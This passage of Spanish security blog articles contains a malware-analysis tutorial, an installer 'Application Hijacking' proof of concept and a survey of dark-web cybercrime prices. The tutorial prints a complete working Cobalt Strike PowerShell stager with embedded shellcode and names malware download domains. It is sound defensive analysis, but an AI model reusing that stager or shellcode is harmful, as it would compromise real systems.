MC_Office_DDE_Command_Execution DDE_inOffice.yara $ python zipdump.py -D "NanoCore-Balance Statement.docx" | yara DDE_inOffice.yara MC_Office_DDE_Command_Execution DDE_inOffice.yara Vemos coincidencias, por lo que ya tenemos una idea de lo que va a pasar. Vamos a aprovechar la opción en “zipdump.py” donde le puedes poner la regla Yara que quieres utilizar, así se verá mejor: $ python zipdump.py -y DDE_inOffice.yara 9690051ee1cb4c8fd3462f0aaeb1ab54-warehouse.docx Index Filename Decoder YARA namespace YARA rule 4 word/document.xml DDE_inOffice.yara Office_DDE_field 4 word/document.xml DDE_inOffice.yara MC_Office_DDE_Command_Execution Si abrimos el malware en un entorno controlado, es decir, no nos importa infectarnos :P, vemos el siguiente mensaje: [Imagen: Ejecución de malware] Pulsamos en “Sí”. Nos aparece el siguiente mensaje: [Imagen: -NoP -sta -NonI Hidden -c] Con estos mensajes ya se ve lo que intenta (más información en estos enlaces): - Artículo original - Reglas Yara - Detectanto reglas Yara en documentos Word Abrimos el debugger y ponemos Breakpoints en CreateProcess[A|W] que a más bajo nivel llamará a CreateProcessInternalW, en este caso. [Imagen: Inmunity Debugger] Lo dicho. [Imagen: CreateProcessInternalW] Ya tenemos la ruta del malware, (Espacios Insertados) : "hxxp://dailycare4u. co. uk/assets/img/background.jpg". ## Parte 6 Ya hemos visto varios ejemplos de documentos ofimáticos, pasaremos a los de scripting como javascript, visual basic script, etc. Tenemos la siguiente muestra: [Imagen: Factrue-Orange] Aparentemente, se trata de una factura, ¿en javascript? Lo abrimos con mi aplicación favorita para estos casos: [Imagen: Execute VBS/JS by Rafa] Han utilizado un ofuscador comercial, así que habrá que desofuscarlo. Utilizo mi programa que automatiza el proceso de escribir en el fichero original los cambios necesarios para ejecutarlo y capturar la respuesta. Cambio el "eval" por "WScript.Echo", sencillo, ¿verdad? [Imagen: WScript.Echo] Y pulso en ejecutar (el botón de play). [Imagen: Ejecución ( Botón Play )] De nuevo, está ofuscado, no se ve nada a simple vista. Vemos otro “eval”, lo volvemos a cambiar. [Imagen: Sustitución eval] Nos pasa lo mismo que en Windows, a veces, ERROR FATAL! (es broma) [Imagen: Error en ejecución] Como veis, distingue entre mayúsculas y minúsculas: "WScript.Echo", así que lo arreglamos. [Imagen: Cambio Case Sensitive] Y ya tenemos el contenido de forma adecuada. [Imagen: Código VBScript desofuscado y legible mostrando variables como sh, fs y Ch] Este código ya es legible. [Imagen: Código legible] Y aquí tenemos hacia donde se conecta y todo lo demás. De forma adicional, se puede utilizar una máquina virtual (no nos importa infectarnos) y utilizar ApateDNS para comprobarlo: [Imagen: ApateDNS] ## Parte 7: Le toca el turno a VBA (Visual Basic for Applications). [Imagen: My Online Security] Nos dicen cual es la muestra y 1 dominio al que se conecta: [Imagen: Muestra de Malware] Parece que se descarga algo de “pamplonarecados.com”. Solamente lo reconocen 4 antivirus: [Imagen: Virus Total] Solamente aparece ese dominio, pero seguramente haya más dentro del malware. Si se analiza el mismo en un entorno como un Cuckoo o similar, si se conecta al primero (hablo de los downloaders), ya no aparecen los demás a donde iría en caso de fallo. Esto es importante, porque en las plataformas online, en muchos casos se ve 1 dominio o ip y en realidad hay alguno más. Un truco clásico que utilizan este tipo de Malware para no ser detectados es cortar de alguna forma las cadenas. [Imagen: Corte de cadena de caracteres] “WScript.Shell” indica que va a ejecutar algo, sería algo parecido a las funciones de la API “ShellExecute[A|W]” o “WinExec”. Los antivirus suelen buscar la cadena al completo, pero y si se programa de esta manera, "WS"+"cript.Shell", a veces el Antivirus no se entera. Con estos simples cambios, logran saltarse las detecciones. Si bajamos un poco más en el script, vemos lo siguiente: [Imagen: Evasión de Antivirus] De nuevo, "http://" al revés, ".exe" al revés... así que vamos a ponerlo todo como es debido. Para ello utilizo mi aplicación: [Imagen: Aplicación by Rafa] Con las cadenas resultantes, intuimos que descargará algo de algún sitio web (http://) con XMLHTTP, lo guardará en el temporal, lo llamará VTflxABUKQX.exe y lo ejecutará (WScript.Shell). Sólo nos queda saber desde donde descargará el malware, bajamos un poco más en el script: [Imagen: Url descarga Malware] Se ven a simple vista (el comando strings hubiera sido útil), son 3 en total. [Imagen: Urls Malware] IMPORTANTE: Tened esto en cuenta, que en las plataformas online aparecerá el primer sitio al que se conecta, el resto no, hay que sacarlos todos. ## Parte 8: El último del artículo. [Imagen: CobaltStrike] Este es el contenido: Utilizaremos el comando “base64 -d”, de los más utilizados en el mundo del malware. [Imagen: Base 64] Se trata de un script en powershell: if([IntPtr]::Size -eq 4)``{$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1 .0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(, [Convert]::FromBase64String (''H4sIAAvAMFoCA7VWbW/aSBD+nEr9D1aFhFEJ2ECSS6RIZwMGJ5hAjM3bodPGXuOFtdex18HQ 63+/MS9tqqZ37Um3Anl3dmZ25pmZnfXS0OGEhQK7WrWET+/fnQ1QjAJBLITuStuWhUIklc7OgF7I MqoKt4I4V6KoxQJEwsXNTTONYxzyw7rSwVxJEhw8UYITsST8JYx9HOPzh6cVdrjwSSj8WelQ9oTo kW3bRI6PhXMldPO9HnNQbk3FjCjhYvGPP4ql+bm8qLSfU0QTsWhuE46DiktpsSR8LuUHjrYRFosG cWKWMI9XxiSs1ypWmCAP90HbCzYw95mbFEvgBfxizNM4FPb+5AoO22IRpoOYOYrrxjgB7ooevrA1 BiRSSsvC7+L8ePpjGnISYNjnOGaRieMX4uCk0kWhS/Ej9hZiH29OTv+skPhaCLgGPC6VIQ5vmGkw N6X4IFksfW/oIXYlGIf4geOf3797/847BdtLN/7rYMPsbL6fY7BOHLCE7PluBaksGHAO4izewrIw ilNcWgjzHPX5YiEU4otrv/xjefnEDKy7365HQJrbjLgLEDnGo8DaOfXHWdXCHglxaxuigDinxBHf whh7FO89rJzY+mCSWDxuYLeFKV4inqNWFubfi7UDwr/IqimhLo4VB+KUgFUQwtK3xhwCIRb10MAB IHRYFwF1D9IVn7iPKbo9nZ6vganYpChJysIghXpxyoKJEcVuWVDChBy3lJSz/bT41VwjpZw4KOEn dYvSAcXjaU0WJjxOHQgZeD4yI+wQRHMgykKXuFjdmmR5OrX4JgxNRCkJl6DpBcIAlNx9k+eJEIOB +6CXKibmehBRHADPvmw1ipZQpMdU32cOWmK3+K19p0Q+ZG2OwwmAV9ZBcE3KeFmwScyh9nNM8/z5 b4e/qnowoxnjYxDEU2XM1S3P87ngB3kuHhHZ+x9z8F2LWaCiBF82TB4DMuKH6gNpKjCmekgNR10T WdkQWTfgb5G6zlpX7v3dqluNW5nvKXqiG91Ba9jtNl7uTLvBzbbO7wc6N9qT1cpUuo/WlM90pTsi 0nra2EV3ZGf2FHeaVS936m4jqdlutXS9acvzllee+ShfaKQ3bg5VqYZ6rXbaG6sbVWokbbLpDok1 XN9p/GlqU2R51eVEvkYk68UrW2ZPgS0pHb+OxheR3fENdzvtVq+trCb3Rxb8USsaY+RVZRvmS6DV Vlc6+HnZdFT4vPTrUc/qqlNU48/9cbR5bMrhqN6/fOiqTcuKuqMVjYZ1GrjatTWsbTbTsS0bEvVd W71zOjx8rFF9JMkTtHYDs53d250oc4JsZ3TatZndD8zRrG6th5m7c6V+aGtPba4Pqc1mrSk3V+3N w9ifml2b2BN9Z+zcyJlY8nB8t7U619TU+hezrbyeTijvd9zMle+G1sTOnqTsZaS5zFrPbLuuyP2O dqloKrMbgZe9VG3izEZIUbYN/THHADTO2KVspQ/Vqk0Ddj+pEcXYKArB6rOqqc9d2HcthH2Qtfa4 zVhvOJ1i4PcdVdY6RG8DP2qPNn3cqsrWtbzDfi/PF7RWmZIj2VkqSltRrJo/jbQBrV6PQc/D3YXs MiXPLK0/Rur9mOBeVZ5OFNf42FM33Vau/8JetSYf/bgKw9gNU2OlZL1VO+ubja0xWipptSkzOntW tEFVHt7efshrAIqgsGsZ7qv8/lFPMlCc+IhC3kOzOd0yGou1Y/8YMJJLiOL+0bDGcYgp9Fzoyqdy VShlTt6+9p0GWuehoS3gtrFgWq+9OSsJXxhLX9vaiXRzMwMr4QLwg0oPh0vul6WsLknQoqSsIYGP P+9Xk0VbERSV8wa3h+Wgl+71lvIroZCM/l+ojteQDx/336D6SvuH3Z+CTyof3P2O/C3hl9D8ZdfH iHDgNOEmpfjQw99G4JgXr944yQii7h1H/sJ8SPl5Hx4+fwPS29m9ygoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellEx ecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.Crea teNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); Tenemos un stream comprimido y una cadena codificada en base64: GzipStream y FromBase64String. [Imagen: Base 64 y Gzip] Concateno un par de comandos, “base64 -d” y “gzip -cd”. function o7jD { Param ($ndjFy, $p0) $xxlB = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') return $xxlB.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($xxlB.GetMethod('GetModuleHandle')).Invoke($null, @($ndjFy)))), $p0)) } function fuwh { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $r59h, [Parameter(Position = 1)] [Type] $z89T = [Void] ) $oE = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $oE.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $r59h).SetImplementationFlags('Runtime, Managed') $oE.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $z89T, $r59h).SetImplementationFlags('Runtime, Managed') return $oE.CreateType() } [Byte[]]$hm = [System.Convert]::FromBase64String ("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEX jjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04 sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NTaDpWeaf/1V NTagNTU2j7IAAA6CcBAAAvN3pLUHBYa2tqNWpwRC1nT3N6OHBCUUpHTjlpQ3lmdF9UQ2wwYWV1M0 lhdVBJcGtnR2lIT01XakdmSExKVGpxcmxzMGE2ZVNmSTZ3UkQxdzd0NnVFbEtIQlVoZDYtSjEwOW hYSHViVXIzMzdpcXU1QWJyUG9lSFN5Zy1kYXltNGdxd1JQUXVxb0xvTFdoUkZVV3A1NGF6AFBoV4 mfxv/VicZTaAAy4IRTU1NXU1Zo61UuO//VlmoKX2iAMwAAieBqBFBqH1ZodUaehv/VU1NTU1ZoLQ YYe//VhcB1FGiIEwAAaETwNeD/1U91zehLAAAAakBoABAAAGgAAEAAU2hYpFPl/9WTU1OJ51doAC AAAFNWaBKWieL/1YXAdM+LBwHDhcB15VjDX+hr////MzQuMjAxLjExNS4yMTgAu/C1olZqAFP/1Q ==") $zDMd = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((o7jD kernel32.dll VirtualAlloc), (fuwh @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $hm.Length,0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($hm, 0, $zDMd, $hm.length) $sT = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((o7jD kernel32.dll CreateThread), (fuwh @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zDMd,[IntPtr]::Zero,0,[IntPtr]::Zero) [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((o7jD kernel32.dll WaitForSingleObject ), (fuwh @([IntPtr], [Int32]))).Invoke($sT,0xffffffff) | Out-Null Ya va tomando forma de lo que va a pasar. Traduzco todo esto, se va a reservar memoria y se va a crear un hilo con el contenido de algo (el payload está en negrita). Voy a extraer el payload y ver su contenido: [Imagen: Payload Malware] Y aquí tenemos el contenido el contenido de ese payload. Espero que os haya gustado los ejemplos... lo dicho hay tantas formas de hacerlo como personas en el mundo ;-) --- # Application Hijacking en instaladores de Microsoft URL: https://ciberseguridad.blog/application-hijacking-en-instaladores-de-microsoft/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2019-08-26 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Vulnerabilidad Microsoft o (más bien) visores de ciertos tipos de ficheros como son Visio, Power Points no parcheados. Conoce que es Application Hijacking. Hola a tod@s. Hace un tiempo le reporté a Microsoft una vulnerabilidad, o eso creía yo, en una serie de instaladores de aplicaciones o (más bien) visores de ciertos tipos de ficheros como son Visio, Power Points y un antiguo instalador de Virtual PC. Me contestaron que al ser aplicaciones antiguas no iban a proceder a actualizarlas con algún tipo de parche, por lo que no harían nada con ellas. Así que me he animado a mostrarlo por aquí, para que veáis qué podría hacerse con esto… Se trata de Application Hijacking (no busquéis esto porque no lo encontrareis, me inventé ese nombre :P). Les puse más o menos esto: los instaladores de Microsoft (que veréis más adelante) permiten a usuarios locales ganar privilegios pudiendo ejecutar un troyano copiandolo con el nombre de “msiexec.exe” en el mismo directorio que el instalador. Sería algo parecido a DLL Hijacking pero con ejecutables. Les mostré esta prueba de concepto: Copia el malware como “msiexec.exe” en el mismo directorio que el instalador y ejecuta el instalador. Los instaladores vulnerables son: ppviewer.exe, vpc2007setup.exe, visioviewer.exe and PowerPointViewer.exe $ md5sum ppviewer.exe vpc2007setup.exe visioviewer.exe PowerPointViewer.exe 1facc59a11680d1f828ed5118a0270 0171c34bb463a2fe2e2e38c5c59237 b76ccc3167042cd34cb389a7b5a2ad 9b4b476488674ae103d2e97cd88cd2 Veamos una demo con vpc2007setup.exe Para detectarlo utilizaremos el Process Monitor con una serie de filtros: [Imagen: Captura de Process Monitor filtrando eventos del proceso msiexec en Virtual PC 2007] Renombramos CMD.exe a msiexec.exe: [Imagen: msiexec.exe] Podemos ver las propiedades del instalador: [Imagen: Carpeta de Windows con los archivos msiexec.exe y virtualpc2007.exe renombrados] Y ejecutamos el instalador. [Imagen: Consola de Windows XP abierta tras ejecutar el instalador virtualpc2007.exe renombrado] Se abre el cmd.exe ejecutado por el instalador. Las aplicaciones vulnerables a “Application Hijacking” las podéis encontrar en la web de microsoft. Ejemplo con ppviewer [Imagen: Process Monitor mostrando el proceso ppviewer.exe lanzando msiexec.exe desde G:\CVE] Ejemplo con visioviewer [Imagen: Registro de Process Monitor del proceso visioviewer.exe ejecutando msiexec.exe con hijacking] Ejemplo con PowerPointViewer [Imagen: Proceso PowerPointViewer.exe ejecutando msiexec.exe con hijacking de aplicación en CVE] Imaginaros un fichero comprimido con el instalador y otro con un nombre como “msiexec.exe”, desconfiad de él, NO lo ejecutéis nunca. Igual que ocurre esto en instaladores de Microsoft puede ocurrir en instaladores de otros fabricantes. Ahí lo dejo. Hasta otra!! --- # El precio del cibercrimen en el mercado dark web URL: https://ciberseguridad.blog/el-precio-del-cibercrimen-en-el-mercado-dark-web/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-08-25 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > El cibercrimen se esta adueñando de Internet. El 85% de envío de emails es correo no deseado y los ciberataques están al alcance de cualquiera. ! DESCUBRE ¡ La tecnología está invadiendo nuestras vidas, realizamos una multitud de operaciones utilizando nuestros dispositivos, verificamos el saldo de nuestra cuenta bancaria, pagamos el parcking e intercambiamos documentos, tanto en la parte profesional, como personal. Los smartphones, las redes sociales y la cloud son los paradigmas que han cambiado la experiencia del usuario en su vida "on line". Estas y otras muchas plataformas más, administran hoy casi toda la información disponible en Internet, una ingente cantidad de datos invaluables. La información es dinero y los ciberdelincuentes lo saben. El delito cibernético está evolucionando en complejidad y capacidad organizativa, y en muchos aspectos funciona exactamente como una gran multinacional. [Vídeo](https://www.youtube.com/watch?v=HJKkkaL6Trc) Los ciberataques, el malware, el robo de identidades, el phishing y el spam son las amenazas emergentes que amenazan a los usuarios. Del otro lado, los atacantes cometiendo actividades maliciosas y creando una economía sumergida comparable a la de algunos paises. Como es habitual, la información más interesante sobre las actividades de ciberdelincuencia la proporcionan las principales empresas de seguridad que recopilan datos de las redes mundiales de inteligencia capaces de detectar y analizar las amenazas en ciberseguridad e identificando las nuevas ciberamenazas. La empresa Symantec Security publica anualmente un interesante informe titulado "Internet Security Threat Report" , que ofrece una visión general completa de las principales amenazas de ciberseguridad detectadas en su red durante el año. Hace unos días, hemos visto como los servicio de seguridad de Telefónica para pymes previnió más de 80.000 incidencias de ciberseguridad en dos mess. La situación es preocupante, la falta de conciencia sobre las principales ciberamenazas, la escasa seguridad de la información en el diseño o los comportamientos de riesgo de los usuarios son factores que contribuyen a exacerbar la situación. Pero de todo esto, lo que realmente me sorprende, es la capacidad organizativa de los cibercriminales, la cual, no tiene nada que envidiar a cualquiera de las grandes empresas, siendo en muchos casos, el ejemplo perfecto de Agile (Eso si, sin Post It). Una estructura jerárquica típica en la que cada actor tiene un papel y una responsabilidad bien definida, desde los líderes hasta las "criptomulas". Los "ejecutivos" de la jerarquía supervisan las operaciones, definen la estrategia y el modelo de negocio a implementar, verificando que todo se realice según lo planeado. Y cómo núcleo del negocio: la tecnología, grupos de especialistas capaces de desplegar sofisticados programas maliciosos, organizar redes privadas de bots y diseñar falsos programas antivirus, eficaces kits de herramientas de explotación, hasta el punto de llegar a cambiar el voto de un pais. Al igual que cualquier organización legítima, el código es revisado y sometido a estrictos procesos de validación y escrutinio por parte del resto de la organización. Otro aspecto interesante a la par que curioso, es el proceso de reclutamiento para operaciones a gran escala, en las que los afiliados especializados establecen programas de reclutamiento en busca de perfiles tecnológicos específicos para organizar ciberataques (Normalmente de Denegación de Servicio). En muchos casos, estos reclutamientos, se realizan en canales de chat IRC clandestinos. ## Impacto económico del cibercrimen El número de ataques bloqueados por Symantec o los mencionados, bloqueados en tan solo dos meses en las pymes por parte de Telefónica, son sólo la punta del iceberg (No mencionamos ataques a grandes empresas por ejemplo), el cibercrimen es sin duda el responsable de la mayoría de estos. Las armas privilegiadas utilizadas son el malware, los kits de exploits y las técnicas de phishing e ingeniería social. ### El cibercrimen y los negocios Los ataques dirigidos que aprovechan las vulnerabilidades Zero day no son los más peligrosos, si no los más comunes. El uso de exploits de vulnerabilidades conocidas para las que una empresa tenga un proceso de gestión de parches lento y a menudo incorrecto expone a las infraestructuras TI a riesgos concretos, pudiendo verse comprometidas. Estos datos fueron proporcionados por Symantec en el informe sobre actividades maliciosas relacionadas con la ciberdelincuencia que anteriormente hemos mencionado: - Los ataques basados en la Web aumentaron un 56% - 3.7 Millones de ataques FormJacking bloqueados en end points - 33% más de Ramsonware movil - 78% más de ataques a la cadena de suministros - El 85% de todos los correos remitidos, son SPAM - 100% de incremento en el uso de scripts Powershell En cuanto a los datos, es fácil prever un nuevo aumento de los ataques en 2020, y así de forma continuada, año tras año.Las empresas son víctimas cotidianas de diferentes tipos de ataques, como brechas de datos, destrucción de sistemas o la violación de sus sistemas de red. En 2012 habia un promedio de 1.8 ataques exitosos cada semana, actualmente, no solo exitosos, contamos con 12 ataques por segundo. [Imagen: Gráfico de barras de Accenture comparando el coste del cibercrimen entre 2017 y 2018] ### La ciberdelincuencia, una amenaza social Los gobiernos, los organismos de inteligencia y los organismos encargados de hacer cumplir la ley están de acuerdo en que los ciberdelitos representa una de las principales amenazas para la seguridad de la sociedad. La escala de los ciberdelitos es asombrosa: 1,5 millones de víctimas diarias, lo que supone un coste global anual al consumo de más de 110.000 millones. Es por ello, que en Movistar nacio Conexión Segura. Cuatro de cada diez usuarios de redes sociales han sido víctimas de los ciberdelincuentes, pero los datos más preocupantes son que uno de cada seis usuarios a informado de que alguien ha cometido un ataque a uno de sus perfiles en redes sociales, hackeado por alguien que pretende hacerse pasar por su victima. Las plataformas de redes sociales y las plataformas móviles se consideran canales privilegiados para posibles estafas y fraudes. El mayor número de víctimas se encuentra en Rusia, China y Sudáfrica, países en los que las actividades maliciosas son muy populares, y donde los medios para protegerse de las mismas, son más escasos. ### Ciberdelincuencia en las profundidades de internet Es imposible proporcionar una imagen clara de la amplia comunidad hacker mundial, un universo complejo compuesto por un gran número de grupos que comparten opiniones, herramientas y cualquier otra información en foros dedicados y autogestionados por ellos. Las plataformas son diversas, toda tecnología es buena si la intención final es compartir, luego depende de cada uno el uso que quiera dar a dicha información. Estos lugares también se utilizan para ofertar actividades ilegales, venta de código malicioso, servicios de hacking .... un mercado negro que está alcanzando cifras impresionantes. Muchas compañías de seguridad han intentado infiltrarse en estos grupos ya que representan una fuente increíble de información y su monitorización podría permitir descubrir las tendencias de los delitos, detectando nuevas amenazas o una nueva variante peligrosa de algún malware. Trend Micro publicó un informe fascinante sobre las actividades clandestinas en rusa en cuanto a ciberseguridad se refiere, una de las comunidades de cibercriminales más activas, proponiendo consideraciones interesantes sobre los principales productos y servicios disponibles en el mercado negro y sus precios. - Servicios de programación y venta de software. - Servicios de Hacking - Venta de servidores dedicados y servicios de alojamiento a prueba de Hackers - Servicios de spam e inundaciones, incluidos servicios de inundación de llamadas y SMS - Servicios DDoS - Servicios de encriptación de archivos - Ventas de troyanos - ... Los ciberdelincuentes han descubierto la posibilidad de proporcionar servicios poco éticos que alquilan herramientas, sistemas de botnets e infraestructuras cloud que proporcionan recursos computacionales bajo demanda. La innovación está representada por la posibilidad de ofrecer también una eficiente "atención al cliente" apoyando a los clientes en sus iniciativas, disposición de plataformas en redes sociales para gestionar la comunidad de clientes mediante una comunicaicón rápida y fluida. El modelo de negocio es consolidado y adoptado por varias organizaciones criminales. Los expertos en seguridad lo denominaron Malware as a Service, aun que el nivel de "As a Service" ultimamente esta tomando muchas denotaciones ( En Junio de 2012 fue su auge inicial donde se descubrió un servicio llamado Capfire4, el cual que ofrecía herramientas y ataques dirigidos) [Imagen: Panel de control en portugués del troyano CapFire mostrando una máquina capturada] Los servicios de programación y las ventas de software eran los servicios más comunes en el mercado de Capfire4. La venta de herramientas de fuerza bruta, bots DDoS y kits de exploits generando un rápido crecimiento de una economía sumergida que se está convirtiendo cada vez más en una seria amenaza para los gobiernos, los cuales no pueden controlar el uso de las criptomonesdas, y más en concreto , de los Bitcoins. Los servicios de cifrado de archivos son muy populares para la creación de malware, un componente esencial para permitir que un código malicioso pueda evitar la detección por parte de los sistemas de defensa, basados en firmas o lo que es lo mismo, sistemas conocidos. La lista de precios propuesta, se gesta de uno de los servicios más demandados por los creadores de Malware, siendo muy conveniente para los delincuentes adquirir los sistemas, pudiendo así mejorar la eficiencia del malware, dificultando el proceso de detección. [Imagen: Tabla con los precios en dólares de distintos servicios de cifrado de malware] En muchos casos, podría ser útil adquirir todo el malware solicitando personalización específica a los creadores que también proporcionan los entornos para difundir el malware. Uno de los estudios más populares está relacionado con el famoso Malware Zeus que se ofrece en la Deep Web a un coste moderado, incluyendo a menudo servicios de alojamiento. Algunas publicaciones en foros rusos: - "Vendo el código fuente de ZeuS 2.0.8.9. Venta privada de código fuente. Precio: US $ 400–500; la negociación (intercambio) es posible ". - "Se acepta la venta de ZeuS 2.1.0.1 bin + configurado en su hosting por US $ 200 en depósito". - "Vendo un constructor Zeus 2.0.8.9 + controles de administración. También hago compilaciones. Precio: US $ 300. Precio de construcción: US $ 100 ". - "LOGS-ZeuS logs (2.4Gb) DE FR IT GB, precio: US $ 250". - “Instalación de ZeuS en su host: US $ 35. Instalación de ZeuS en mi host: US $ 40 ". - "Configuración de ZeuS: US $ 100, soporte para botnet: US $ 200 / mes, consultoría: US $ 30". Siempre en la clandestinidad rusa, se han llegado a descubrir la venta de nuevas variantes de un troyano bancario llamado Carberp , que se utilizará a futuro (Y esto es lo más importante ) contra instituciones financieras ( Podemos ver como se ha actualizado hace tan sólo 10 días ) . [Imagen: Publicación en foro ruso describiendo un bootloader que evade PatchGuard en Windows] Aunque su precio se vio reducido drasticamente cuando se filtro su codigo fuente: [Imagen: Mensaje de foro ofreciendo el código fuente del bootkit Carberp con enlace de descarga] Lo interesante de este malware que escu día llego a valer entre 10K y 40K en alquiler por mes (Ojito), es que ayuda a infectar un registro MBR, lo que significa que los hacker tendrán futuras oportunidad a largo plazo de controlar a sus víctimas sin ser detectados por los antivirus. El por qué, lo tenéis aquí. El modelo de ventas conocido como "Malware as a service" es muy peligroso porque abre las puertas a la delincuencia ordinaria que, sin un conocimiento particular, podría provocar ataques serios contra los sistemas. En algunos casos, para proteger su anonimato, implementan la estructura de ventas en la Deep Web. Otros elementos que a menudo se solicitan en la Deep Web , son los servicios de pago por instalación, como los servicios de descarga, los ciberdelincuentes proporcionan el archivo malicioso a un proveedor de servicios o le solicitan una personalización de los agentes maliciosos más comunes, y el proveedor gestiona los aspectos de distribución para ellos. Llegados a este puntos, os preguntareis , cómo no he empezado tal vez, por los más conocidos (Los ataques DDoS y las botnets ).De hecho, incluso las botnets se usan a menudo para propagar malware. A pesar del hecho de que el ataque DDoS es muy peligroso para las infraestructuras de TI, es simple adquirir herramientas para llevar a cabo este tipo de ataque o alquilar una "denegación de servicio de un día", que los ciberdelincuentes tienen a nuestra disposición por un coste de 30-70 €. Para organizar los ataques DDoS, los ciberdelincuentes deben usar bots y redes de bots especialmente diseñados. Esto significa que debe obtener acceso a una gran cantidad de máquinas e instalar un demonio usando su kit de bot DDoS. En la siguiente tabla están los costes reportados para el alquiler de servicios DDoS y el alquiler de botnets, que cómo podemos ver, es extremadamente barato. (Tendríamos que saber que ancho de banda ofrecen) [Imagen: Tabla de precios en dólares de un servicio de ataques DDoS por horas y días] Los servicios y entregables más solicictados dentro de la Deep Web son: - Servicios de consultoría como por ejemplo una configuración de botnet (350-400€) - Servicios de infección / propagación (100€ por 1K instalaciones) - Botnets & Rentals - Denegación directa de servicio (DDoS) $ 535 por 5 horas al día durante una semana. - SPAM / Correo electrónico no deseado (40€ / 20K correos electrónicos) y correo SPAM en web (2€/30 publicaciones) - Alojamiento en servidores privados virtuales (6€/mes) - Alojamiento a prueba de Hackers / Fast Flux / VPNs y proxies inversos (3€/mes) - Blackhat Search Engine Optimization (SEO) (80€ por 20K backlinks) - Intercambiadores de dinero y servicios de criptomula (Acordaros de que acuñé el termino ;) ) (comisión del 25%) - Romtura de CAPTCHAS (1€/1K CAPTCHAS) —Hecho a través de humanos reclutados, por norma general Indios. Estos entregables indicados, se proporcionan utilizando diferentes modalidades, como puede ser alquilar, comprar o arrendamiento, respondiendo siempre a las necesidades de los clientes. Y así infinidad de servicios que podemos contratar en la Deep Web a nivel de ciberseguridad, no voy a entrar en categorías más "duras". Si quereis haceros una idea de este otro perturbado lado de la Deep Web, os recomiendo que veais (Yo la ví esta semana) la pelicula Eliminado: Dark Web [Imagen: Cartel de la película de terror Eliminado: Dark Web con un rostro cubierto] ## Lavado de dinero con criptomulas Una industria rentable necesita reinvertir las ganancias ilegales en negocios legítimos, un papel fundamental en las organizaciones cibercriminales cubiertas por las "criptomulas", personas que a sabiendas o sin saberlo, son utilizadas para lavar ganancias ilegales de estas organizaciones criminales. Las criptomulas se utilizan para transferir dinero de forma anónima desde entidades, generalmente a través de servicios de transferencia bancaria anónimas como Western Union, Liberty Reserve, o Paysafecard. Usando los servicios de criptomonedad, normalmente como el Bitcoin, que ofrecen un instrumento válido para el lavado de dinero que evita de una forma muy sencilla que las fuerzas del orden puedan interceptar el pago realizado para financiar actividades ilegales, siempre teniendo un cierto control y tomando algunas precauciones, como son los Mixer de Bitcoins o similares. Las organizaciones de ciberdelincuentes están estructuradas como empresas. Desarrollan un modelo de negocio detallado y una estrategia de monetización "porque incluso una empresa ilegal necesita" pagar las facturas "para abrir la tienda". La administración del dinero es un aspecto vital, ya que las organizaciones tienen que rastrear los recursos utilizados y las ganancias por su utilización, lo hacen utilizando herramientas comerciales de administración de procesos comerciales, sistemas financieros y muchos otros instrumentos para administrar todo, desde el desarrollo de software hasta las cuentas por pagar. A muchas empresas les gustaría ser tan eficientes ... [Imagen: Diagrama explicando el circuito de blanqueo de dinero mediante mulas bancarias] ## El mercado de las vulnerabilidades Zero Day - 75% de navegadores web modernos (Internet Explorer, Firefox, Google Chrome, etc.); el más interesante es Safari, debido a que el interés de los hackers profesionales está en el robo de personas con un alto poder adquisitivo, que tradicionalmente usan MacBooks y otro tipo de productos de Apple (Aunque esto ya no considero que sea así del todo). No todos los proveedores están listos para actualizar su software rápidamente, por eso los ciberdelincuentes lo usan para propagar malware a través de vulnerabilidades en complementos diseñados para estos navegadores. Por ahora, no había muchas vulnerabilidades privadas, pero debido a esta razón hay muchas modificaciones de paquetes de exploits con vulnerabilidades conocidas (como Stynx exploit y muchos otros). Los paquetes de exploits modernos más eficientes incluyen módulos especiales llamados «Plugin Detect», que ayudan a no ejecutar exploits en clientes no vulnerables. - 15% del software de Antivirus (principalmente HIPS) con derivación heurística. Buenos ejemplos son los métodos de omisión de Microsoft, algunos de ellos se comercializan en el mercado negro por mucho dinero u otro tipo de fallas en Antivirus / HIPS / FW que son conbinados con malware a un precio mayor pero una efectividad de casi 100%. - 10% de vulnerabilidades en la escalación de privilegios. La mayoría de estas se 